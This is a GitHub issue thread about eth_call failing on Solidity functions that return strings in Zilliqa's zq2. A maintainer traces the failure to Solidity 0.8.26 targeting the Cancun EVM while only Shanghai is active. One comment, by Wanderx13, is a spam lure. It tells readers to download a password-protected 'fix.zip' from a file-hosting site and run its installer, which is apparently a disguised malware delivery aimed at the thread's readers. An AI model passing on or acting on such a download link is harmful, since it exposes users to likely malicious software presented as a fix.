### ISSUE TITLE
`eth_call` doesn't work on Solidity functions returning a `string`

### ISSUE THREAD

**Issue by DrZoltanFazekas** [Zilliqa/zq2#1342]
Here's an example:
```
contract Test {
    string public s = "hello";
    uint256 public u = 18;
}
```

Calling u() returns 18, but calling s() results in
```
{"jsonrpc":"2.0","error":{"code":-32603,"message":"halted due to: NotActivated"},"id":1}
```

That's why adding ERC20 tokens to MetaMask doesn't work - the wallet can't query the token symbol.

I haven't tested with other dynamic return types such as bytes yet.

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JamesHinshelwood** [comment]
@DrZoltanFazekas What is the Solidity version of the contract?

`revm` will return `NotActivated` if an opcode is used from a future Solidity version that isn't enabled. Currently we have the Shanghai fork activated, which means any Solidity version greater than `0.8.25` (where the default EVM version was switched to Cancun) will probably have problems.

**Comment by DrZoltanFazekas** [comment]
I didn't check the Solidity version (0.8.26, the default in Remix), my bad - nor did Plunderswap who reported the original ERC20 issue - thanks @JamesHinshelwood
